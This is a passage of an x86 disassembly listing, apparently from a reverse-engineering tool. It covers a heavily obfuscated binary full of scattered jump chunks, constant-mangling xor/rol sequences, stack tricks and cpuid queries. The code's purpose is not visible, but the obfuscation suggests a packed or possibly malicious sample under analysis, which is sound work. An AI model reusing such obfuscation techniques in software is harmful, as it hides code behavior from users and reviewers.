loc_42F768: ; CODE XREF: sub_42B470:loc_426E6B�j
push 21766222h
pop eax
and eax, 0C13A4CEAh
xor eax, 678A6760h
rol eax, 1Ch
jmp loc_42C5FC
; END OF FUNCTION CHUNK FOR sub_42B470
; ---------------------------------------------------------------------------
add esi, ebx
jmp loc_429966
; =============== S U B R O U T I N E =======================================
sub_42F789 proc near ; CODE XREF: sub_42826A+8�p
; _7hdaygc1:00429149�j
; FUNCTION CHUNK AT 0042358A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424A85 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00424B9F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00424E92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425060 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042910B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042D605 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042FCAE SIZE 00000011 BYTES
xchg edi, [esp+0]
pop edi
jle loc_42B068
loc_42F793: ; CODE XREF: sub_42F789-ACFD�j
; _7hdaygc1:loc_426991�j ...
mov eax, [ebp-8]
jmp loc_42358A
sub_42F789 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A462
loc_42F79B: ; CODE XREF: sub_42A462+6�j
push esi
push 0B08D318Fh
pop esi
and esi, 0FBAF5E2Ah
xor esi, 1573E4C2h
add esi, ebp
jmp loc_42E783
; END OF FUNCTION CHUNK FOR sub_42A462
; =============== S U B R O U T I N E =======================================
sub_42F7B5 proc near ; DATA XREF: sub_42CA28:loc_42CA3B�o
add dword ptr [ebp-8], 2
jmp loc_42BF18
sub_42F7B5 endp
; =============== S U B R O U T I N E =======================================
sub_42F7BE proc near ; CODE XREF: sub_423648-24�p
; sub_423648+672C�p
push ebp
push offset sub_429A26
jmp nullsub_136
sub_42F7BE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42F7C9: ; CODE XREF: sub_425C3B:loc_426A5D�j
sub ebx, ds:4000F6h
xor ebx, 95B8A9AFh
test ebx, 10h
jmp loc_42A03E
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
loc_42F7E0: ; CODE XREF: _7hdaygc1:004284B6�j
jnb loc_4285D6
; =============== S U B R O U T I N E =======================================
sub_42F7E6 proc near ; CODE XREF: sub_42C16F-31BC�p
; FUNCTION CHUNK AT 0042CD3F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042CD85 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
add [edx], eax
pop ecx
jmp loc_42CD85
sub_42F7E6 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_107. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42F7F3: ; CODE XREF: _7hdaygc1:0042A4EC�j
jmp loc_42C71A
; ---------------------------------------------------------------------------
loc_42F7F8: ; CODE XREF: _7hdaygc1:0042309E�j
jmp loc_42C612
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42F7FD: ; CODE XREF: sub_42C443+1460�j
xchg ebp, [esp+4+var_4]
push 1A4F24C8h
pop ecx
sub ecx, 43AE0854h
or ecx, 0DEE54127h
and ecx, 0AA1D4C0h
add ecx, 0F5A1656Ch
jmp loc_42876A
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F291
loc_42F823: ; CODE XREF: sub_42F291+16�j
call sub_42DAF7
mov ebx, 0DAF2556Bh
jmp loc_429E9C
; END OF FUNCTION CHUNK FOR sub_42F291
; ---------------------------------------------------------------------------
pop ecx
rol ebx, 17h
jmp sub_427248
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42F83B: ; CODE XREF: sub_42F65A-A916�j
pop ebx
rol ebx, 9
and ebx, 0ACB80AE2h
xor ebx, 0A0F08294h
add ebx, ebp
add ebx, 0D79F777Ch
jmp loc_42B52F
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
cmp ecx, edx
jmp loc_42B914
; ---------------------------------------------------------------------------
loc_42F85F: ; CODE XREF: _7hdaygc1:loc_429222�j
rol ebx, 6
jle loc_42FBF7
loc_42F868: ; CODE XREF: _7hdaygc1:00429214�j
add esi, 0C4CC0F17h
xchg esi, [esp]
jmp sub_428C3B
; ---------------------------------------------------------------------------
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_4270F0
jmp loc_42C943
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429CCF
loc_42F888: ; CODE XREF: sub_429CCF:loc_42E1A8�j
mov esi, ebp
push offset sub_42C209
jmp nullsub_182
; END OF FUNCTION CHUNK FOR sub_429CCF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42F894: ; CODE XREF: sub_429318-127E�j
pushf
loc_42F895: ; CODE XREF: sub_429318:loc_424633�j
call sub_42FD68
loc_42F89A: ; CODE XREF: sub_4288FE:loc_4248A0�j
or ebx, ds:4000F1h
call sub_426303
loc_42F8A5: ; CODE XREF: sub_4269CB:loc_426174�j
adc ecx, 4FEE9B41h
jmp loc_4273C7
; END OF FUNCTION CHUNK FOR sub_429318
; =============== S U B R O U T I N E =======================================
sub_42F8B0 proc near ; DATA XREF: sub_42EA6A-49A4�o
xchg ebx, [esp+0]
retn
sub_42F8B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4CE
loc_42F8B4: ; CODE XREF: sub_42F4CE-6547�j
jmp loc_423350
; END OF FUNCTION CHUNK FOR sub_42F4CE
; =============== S U B R O U T I N E =======================================
sub_42F8B9 proc near ; CODE XREF: _7hdaygc1:00429845�j
; sub_42911B:loc_42C846�j
push ebp
push offset loc_427E89
jmp nullsub_172
sub_42F8B9 endp
; =============== S U B R O U T I N E =======================================
sub_42F8C4 proc near ; CODE XREF: _7hdaygc1:00426897�j
; _7hdaygc1:004286A8�p
; FUNCTION CHUNK AT 004233C6 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004263DC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426C2C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042977C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004297E3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00429D8B SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0042A494 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A739 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042A8BE SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042C87E SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
add edx, edi
rol edx, 5
xor edx, ebp
rol edx, 5
add edx, esp
jmp loc_42A8BE
sub_42F8C4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42F8D9: ; CODE XREF: _7hdaygc1:00424D90�j
xchg edi, [ebx]
; =============== S U B R O U T I N E =======================================
sub_42F8DB proc near ; CODE XREF: sub_42567E+8289�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004234AC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00423A2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E17 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042A797 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CC5D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042DAD4 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xchg ebx, [esp+0]
mov eax, ebx
pop ebx
xor eax, 1FAF3F42h
and eax, 1CC736C0h
jmp loc_423E17
sub_42F8DB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42F8F6 proc near ; CODE XREF: sub_42D002:loc_424176�p
; _7hdaygc1:00426D98�j
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00425F87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F220 SIZE 00000015 BYTES
xchg esi, [esp+0]
pop esi
xchg edx, [esp+0]
push eax
jmp loc_425F87
sub_42F8F6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42F903: ; CODE XREF: sub_425E64-12DC�j
mov ecx, 0A5C0A545h
jge sub_428371
jmp loc_42D35C
; END OF FUNCTION CHUNK FOR sub_425E64
; =============== S U B R O U T I N E =======================================
sub_42F913 proc near ; DATA XREF: sub_42F65A-1ADE�o
var_4 = dword ptr -4
mov eax, [ebp-4]
push ebx
push eax
pop ebx
xchg ebx, [esp+4+var_4]
call sub_42C7F3
loc_42F921: ; CODE XREF: sub_4246D7+8FFF�j
jmp loc_42CE42
sub_42F913 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FCD3
loc_42F926: ; CODE XREF: sub_42FCD3-3368�j
jmp sub_42F03C
; END OF FUNCTION CHUNK FOR sub_42FCD3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_42F92B: ; CODE XREF: sub_424963+7440�j
jmp nullsub_142
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_42F930: ; CODE XREF: sub_423752+AACA�j
pop ecx
loc_42F931: ; CODE XREF: sub_423752:loc_42812C�j
mov edi, eax
mov eax, 80000001h
xor edx, edx
cpuid
jmp loc_423839
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_42F941: ; CODE XREF: sub_424744:loc_42E163�j
jz loc_4243B2
; END OF FUNCTION CHUNK FOR sub_424744
; START OF FUNCTION CHUNK FOR sub_429318
loc_42F947: ; CODE XREF: sub_429318-26F2�j
jmp loc_423704
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
loc_42F94C: ; CODE XREF: _7hdaygc1:0042341A�j
jmp sub_429999
; ---------------------------------------------------------------------------
sub eax, edi
push 309839DAh
or ebp, eax
popf
pop esi
jmp loc_4243B2
; ---------------------------------------------------------------------------
loc_42F961: ; CODE XREF: _7hdaygc1:0042E5D0�j
ja loc_42734A
; =============== S U B R O U T I N E =======================================
sub_42F967 proc near ; CODE XREF: sub_42ABF7+4F9D�p
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
xchg eax, [esp-4+arg_0]
jmp loc_42C472
sub_42F967 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_42F973: ; CODE XREF: _7hdaygc1:loc_42E59E�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42F974: ; CODE XREF: sub_4291EA+350C�j
jmp loc_4260F0
; END OF FUNCTION CHUNK FOR sub_4291EA
; =============== S U B R O U T I N E =======================================
sub_42F979 proc near ; DATA XREF: _7hdaygc1:0042A6A3�o
xor edx, ebp
rol edx, 5
add edx, esp
rol edx, 5
mov [ebp-4], edx
push offset loc_42D2AA
jmp loc_42E8E3
sub_42F979 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42F991: ; CODE XREF: _7hdaygc1:0042B742�j
jmp loc_42825F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB61
loc_42F996: ; CODE XREF: sub_42BB61-3595�j
jmp loc_42D394
; END OF FUNCTION CHUNK FOR sub_42BB61
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42409E
loc_42F99B: ; CODE XREF: sub_42409E+1E2C�j
jmp loc_42B498
; END OF FUNCTION CHUNK FOR sub_42409E
; ---------------------------------------------------------------------------
loc_42F9A0: ; CODE XREF: _7hdaygc1:00425454�j
jmp locret_42A504
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_42F9A5: ; CODE XREF: sub_42EF91-ADDE�j
pop ecx
or ecx, 1E67273Fh
and ecx, 0CAD0DE94h
call sub_42A607
loc_42F9B7: ; CODE XREF: sub_429318+2A34�j
jmp loc_42C970
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42F9BC: ; CODE XREF: sub_4291EA-1043�j
mov edi, eax
call sub_42D002
loc_42F9C3: ; CODE XREF: _7hdaygc1:0042CB4E�j
jmp loc_426AB7
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
loc_42F9C8: ; CODE XREF: _7hdaygc1:0042A823�j
jmp loc_42A1EA
; ---------------------------------------------------------------------------
loc_42F9CD: ; CODE XREF: _7hdaygc1:0042A10D�j
jmp sub_42A94C
; =============== S U B R O U T I N E =======================================
sub_42F9D2 proc near ; CODE XREF: _7hdaygc1:00425481�j
; sub_425A37+438E�p
; FUNCTION CHUNK AT 0042389E SIZE 00000018 BYTES
xchg edi, [esp+0]
pop edi
mov eax, 0
call sub_42E168
loc_42F9E0: ; CODE XREF: sub_425735+7029�j
jmp loc_42389E
sub_42F9D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D16D
loc_42F9E5: ; CODE XREF: sub_42D16D+11�j
mov eax, [ebp-4]
xor edx, edx
push edx
push eax
call sub_42655C
loc_42F9F1: ; CODE XREF: sub_42B034-78A2�j
jmp nullsub_146
; END OF FUNCTION CHUNK FOR sub_42D16D
; ---------------------------------------------------------------------------
loc_42F9F6: ; CODE XREF: _7hdaygc1:0042F122�j
sub eax, 11254F5Eh
rol eax, 10h
add eax, 0B9A48621h
popf
xchg eax, [esp]
jmp loc_425245
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF7
loc_42FA0E: ; CODE XREF: sub_42DBF7+6�j
cmp ds:byte_427CC0, 0
jnz loc_42AB6C
lea edx, [ebp+var_14]
mov eax, offset dword_425138
jmp loc_429CBC
; END OF FUNCTION CHUNK FOR sub_42DBF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42FA28: ; CODE XREF: sub_42AFFE-208�j
mov [ecx], edi
sub edi, 0FF829170h
mov ebp, 0A4573AE6h
shl ebx, 11h
jmp loc_427DC0
; END OF FUNCTION CHUNK FOR sub_42AFFE
; =============== S U B R O U T I N E =======================================
sub_42FA3D proc near ; CODE XREF: sub_42C6FB:loc_423B47�j
; sub_42C6FB-6C40�j
; FUNCTION CHUNK AT 004267B4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042BB0A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CE7D SIZE 00000018 BYTES
push ebp
loc_42FA3E: ; CODE XREF: sub_42DC52:loc_42DC5D�j
call sub_4270E6
loc_42FA43: ; CODE XREF: sub_42567E+8299�j
jmp loc_4267B4
sub_42FA3D endp
; =============== S U B R O U T I N E =======================================
sub_42FA48 proc near ; CODE XREF: _7hdaygc1:0042BEB7�p
; _7hdaygc1:0042F6B8�j
xchg edx, [esp+0]
pop edx
mov edx, 0DD5E106Fh
push ecx
sub_42FA48 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42FA52: ; CODE XREF: sub_42C443:loc_42CDC2�j
push 5AC1164Dh
jmp loc_423F15
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429557
loc_42FA5C: ; CODE XREF: sub_429557+2�j
jl loc_42DEB4
; END OF FUNCTION CHUNK FOR sub_429557
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_42FA62: ; CODE XREF: sub_4288FE:loc_425D1B�j
push 0
push 0
push edi
push 7797E494h
pop edi
xor edi, 4D2ABAFEh
jmp loc_42E1C8
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42FA78: ; CODE XREF: sub_423648:loc_423F99�j
pop ecx
mov [ebp-20h], eax
; END OF FUNCTION CHUNK FOR sub_423648
; START OF FUNCTION CHUNK FOR sub_42E51C
loc_42FA7C: ; CODE XREF: sub_423648+4CB9�j
; sub_42E51C-5E8A�j ...
jns loc_42C6AC
test byte ptr [ebp-8], 40h
jz loc_42A77E
jmp loc_42CA79
; END OF FUNCTION CHUNK FOR sub_42E51C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42936E
loc_42FA91: ; CODE XREF: sub_42936E+5C82�j
push 0FFFFFFF1h
call sub_42C50D
push eax
call sub_42DAD9
mov edx, [ebp+8]
mov eax, [edx]
add edx, 4
jmp loc_42C94E
; END OF FUNCTION CHUNK FOR sub_42936E
; ---------------------------------------------------------------------------
loc_42FAAB: ; CODE XREF: _7hdaygc1:004292F6�j
jz loc_4289A6
jmp loc_429F73
; ---------------------------------------------------------------------------
loc_42FAB6: ; CODE XREF: _7hdaygc1:00425479�j
sub ebx, eax
; =============== S U B R O U T I N E =======================================
sub_42FAB8 proc near ; CODE XREF: _7hdaygc1:loc_427257�p
; FUNCTION CHUNK AT 004231B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423244 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004240F3 SIZE 0000001C BYTES
xchg edi, [esp+0]
pop edi
push edx
push 2BCC74Ch
pop edx
or edx, 0FC7A5753h
jmp loc_4231B7
sub_42FAB8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282A9
loc_42FACE: ; CODE XREF: sub_4282A9:loc_42D220�j
jnz loc_42B554
shr edi, 1Eh
jmp loc_42B54E
; END OF FUNCTION CHUNK FOR sub_4282A9
; ---------------------------------------------------------------------------
loc_42FADC: ; CODE XREF: _7hdaygc1:0042443B�j
jnz loc_42E57A
jmp loc_42A63E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42FAE7: ; CODE XREF: sub_42AA07+E85�j
mov ebp, [ebx]
pop edi
mov ebx, [eax]
mov ebp, ebx
jmp loc_426666
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DB44
loc_42FAF3: ; CODE XREF: sub_42DB44:loc_42495E�j
add [esi], ecx
xor [esi], edx
mov eax, 80000003h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
jmp loc_4257E9
; END OF FUNCTION CHUNK FOR sub_42DB44
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BA2C
loc_42FB07: ; CODE XREF: sub_42BA2C:loc_428FDD�j
; sub_42BA2C-1898�j
call sub_42D757
mov edx, 4CB976E9h
push edi
call sub_4268BD
loc_42FB17: ; CODE XREF: sub_425735+6C6�j
jmp nullsub_153
; END OF FUNCTION CHUNK FOR sub_42BA2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42FB1C: ; CODE XREF: sub_423648+9AD0�j
mov [ebp-1Ch], eax
js loc_42D646
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_427474[eax*4]
mov [ebp-8], eax
jmp loc_42D637
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
loc_42FB3A: ; CODE XREF: _7hdaygc1:00424B5E�j
shr ecx, 11h
xor edx, eax
jmp loc_4238DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42FB44: ; CODE XREF: sub_425E64+78DB�j
jl loc_42F192
jmp loc_424F99
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F152
loc_42FB4F: ; CODE XREF: sub_42F152:loc_426166�j
jge loc_42AF2B
jmp loc_425D5A
; END OF FUNCTION CHUNK FOR sub_42F152
; ---------------------------------------------------------------------------
cmp edx, 0AA8F5D64h
jmp loc_42D04E
; ---------------------------------------------------------------------------
push eax
ror eax, 17h
jmp loc_42B7C1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FB6E proc near ; CODE XREF: sub_42B942�j
push ebp
mov ebp, esp
push ecx
mov esp, ebp
call sub_423172
sub_42FB6E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42AE9C
loc_42FB79: ; CODE XREF: sub_42AE9C+87F�j
jmp nullsub_154
; END OF FUNCTION CHUNK FOR sub_42AE9C
; ---------------------------------------------------------------------------
loc_42FB7E: ; CODE XREF: _7hdaygc1:00423386�j
jbe loc_42A762
pop edi
jmp loc_42F5C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABF7
loc_42FB8A: ; CODE XREF: sub_42ABF7:loc_42AC07�j
pop eax
rol eax, 8
add eax, 738252C4h
call sub_42F967
loc_42FB99: ; CODE XREF: _7hdaygc1:0042E1D5�j
jmp loc_423DD0
; END OF FUNCTION CHUNK FOR sub_42ABF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_42FB9E: ; CODE XREF: sub_424963+5245�j
jmp nullsub_155
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD51
loc_42FBA3: ; CODE XREF: sub_42BD51:loc_42FD50�j
mov esp, ebp
xchg ebx, [esp-8+arg_4]
mov ebp, ebx
pop ebx
locret_42FBAB: ; CODE XREF: _7hdaygc1:loc_4297CE�j
retn
; END OF FUNCTION CHUNK FOR sub_42BD51
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_42FBAC: ; CODE XREF: sub_425752+9E3A�j
jmp nullsub_187
; END OF FUNCTION CHUNK FOR sub_425752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F3C8
loc_42FBB1: ; CODE XREF: sub_42F3C8+E�j
jmp loc_42CD94
; END OF FUNCTION CHUNK FOR sub_42F3C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42948A
loc_42FBB6: ; CODE XREF: sub_42948A-2DAD�j
jmp loc_42D41F
; END OF FUNCTION CHUNK FOR sub_42948A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428613
loc_42FBBB: ; CODE XREF: sub_428613-4DA5�j
push edx
jmp loc_427F4A
; END OF FUNCTION CHUNK FOR sub_428613
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_42FBC1: ; CODE XREF: sub_42D9E1-A907�j
mov ebp, eax
pop eax
mov eax, ds:dword_42E534
or eax, eax
jmp loc_427F5A
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
loc_42FBD1: ; CODE XREF: _7hdaygc1:loc_42A578�j
call sub_426064
; START OF FUNCTION CHUNK FOR sub_42B14C
loc_42FBD6: ; CODE XREF: sub_42B14C+11�j
jmp loc_427EBA
; END OF FUNCTION CHUNK FOR sub_42B14C
; ---------------------------------------------------------------------------
loc_42FBDB: ; CODE XREF: _7hdaygc1:loc_42352D�j
jz loc_424077
jmp loc_4259FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42FBE7: ; CODE XREF: _7hdaygc1:0042FDC2�j
jmp loc_4235CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42FBEC: ; CODE XREF: sub_42EBD6:loc_42E5D6�j
jnz loc_42D294
jmp loc_42869D
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
loc_42FBF7: ; CODE XREF: _7hdaygc1:0042F862�j
mov ecx, edi
jmp sub_42BD51
; ---------------------------------------------------------------------------
jl loc_42358F
jmp loc_42F522
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E56
loc_42FC09: ; CODE XREF: sub_428E56:loc_42DDDE�j
popf
jmp loc_42D4C6
; END OF FUNCTION CHUNK FOR sub_428E56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42FC0F: ; CODE XREF: sub_4291EA+577E�j
not edi
jmp loc_4297F8
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
adc edi, eax
jmp sub_424F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_42FC1D: ; CODE XREF: sub_42CFDA-2366�j
; _7hdaygc1:0042EEF3�j
xor edx, 0BE968921h
push offset sub_426E2E
jmp nullsub_161
; END OF FUNCTION CHUNK FOR sub_42CFDA
; =============== S U B R O U T I N E =======================================
sub_42FC2D proc near ; DATA XREF: _7hdaygc1:00426398�o
push eax
ror eax, 0Eh
mov ds:dword_42E1C4, eax
jmp locret_428726
sub_42FC2D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CBB
loc_42FC3C: ; CODE XREF: sub_426CBB�j
push edi
mov edi, ebp
jmp loc_42BA0B
; END OF FUNCTION CHUNK FOR sub_426CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429B49
loc_42FC44: ; CODE XREF: sub_429B49:loc_428943�j
push 0B3E86303h
pop edi
add edi, 175EEB9Fh
sub edi, 0BDC05D11h
add edi, 54B7B317h
add eax, edi
pop edi
mov eax, [eax]
jmp loc_423B79
; END OF FUNCTION CHUNK FOR sub_429B49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427248
loc_42FC66: ; CODE XREF: sub_427248+A�j
; _7hdaygc1:loc_42D5CD�j
add [esi], eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
jmp loc_42A99E
; END OF FUNCTION CHUNK FOR sub_427248
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_42FC73: ; CODE XREF: sub_4232DA+4E63�j
js loc_42BA64
cmp ebx, 67E84EAFh
jmp loc_42BF5B
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42FC84: ; CODE XREF: sub_42525E:loc_423DA9�j
; sub_423DDB+B10A�j
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 0
jnz loc_424251
loc_42FC90: ; CODE XREF: sub_42EF77-1ECC�j
js loc_42C7E2
call sub_4273CA
; END OF FUNCTION CHUNK FOR sub_423DDB
; START OF FUNCTION CHUNK FOR sub_429412
loc_42FC9B: ; CODE XREF: sub_429412+3164�j
jmp nullsub_163
; END OF FUNCTION CHUNK FOR sub_429412
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_105. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42FCA1: ; CODE XREF: _7hdaygc1:00426D00�j
jmp locret_42A4AF
; ---------------------------------------------------------------------------
loc_42FCA6: ; CODE XREF: _7hdaygc1:00428DAE�j
push edi
mov edx, [ebx]
jmp loc_4290C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F789
loc_42FCAE: ; CODE XREF: sub_42F789:loc_42D60F�j
setz al
call sub_42A3F7
pop ecx
shl eax, 3
jmp loc_4280F7
; END OF FUNCTION CHUNK FOR sub_42F789
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_42FCC0: ; CODE XREF: sub_4270E6:loc_428088�j
jb loc_424593
sbb eax, ecx
jmp loc_423850
; END OF FUNCTION CHUNK FOR sub_4270E6
; ---------------------------------------------------------------------------
loc_42FCCD: ; CODE XREF: _7hdaygc1:0042AD11�j
jnp loc_42B950
; =============== S U B R O U T I N E =======================================
sub_42FCD3 proc near ; CODE XREF: sub_42EB0D-2F94�p
; FUNCTION CHUNK AT 0042579E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B116 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042B7CD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C962 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042F926 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
jl loc_4237F0
call sub_42BCF6
loc_42FCE2: ; CODE XREF: _7hdaygc1:00423FFE�j
jmp loc_42B116
sub_42FCD3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426978
loc_42FCE7: ; CODE XREF: sub_426978+13�j
and eax, 6CA84A5Dh
test eax, 800h
jmp loc_42933A
; END OF FUNCTION CHUNK FOR sub_426978
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C209
loc_42FCF8: ; CODE XREF: sub_42C209+2FFD�j
xor eax, ebp
mov [ebp+0], esi
loc_42FCFD: ; CODE XREF: sub_42C209:loc_423E9D�j
mov byte ptr [ebp-20h], 2Dh
inc dword ptr [ebp-10h]
neg dword ptr [ebp-8]
loc_42FD07: ; CODE XREF: sub_42C209-2AD1�j
push offset loc_42529A
jmp loc_428475
; END OF FUNCTION CHUNK FOR sub_42C209
; =============== S U B R O U T I N E =======================================
sub_42FD11 proc near ; DATA XREF: sub_4280AB+8�o
; FUNCTION CHUNK AT 004235D4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00424CC8 SIZE 00000012 BYTES
